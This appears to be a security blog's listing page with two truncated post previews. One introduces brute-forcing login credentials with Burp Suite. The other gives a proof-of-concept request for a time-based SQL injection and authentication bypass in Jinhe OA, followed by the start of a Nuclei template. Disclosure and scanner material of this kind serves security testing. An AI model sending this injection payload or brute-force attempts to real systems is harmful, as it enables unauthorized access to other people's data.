Guide to Web Penetration Testing: Brute Forcing and SQL Injection
Authentication Vulnerabilities
Exploiting Weak Credentials
The first challenge involves bypassing authentication through brute force techniques. The objective is to identify valid credentials by testing common passwords against a target login interface.
To execute this attack, an interception proxy like Burp Suite is essential. Capture the init ...
Posted on Wed, 17 Jun 2026 17:11:03 +0000 by lucym
Authentication Bypass and SQL Injection in Jinhe OA
Authentication Bypass and SQL Injection
Proof of Concept
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
Nuclei Template
id: jinhe-oa-auth-bypass-sqli
info:
  name: Jinhe OA Authentication Bypass SQL Injection
  author: security-researcher
  severity: critical
  descriptio ...
Posted on Fri, 08 May 2026 06:44:16 +0000 by Webbyturtle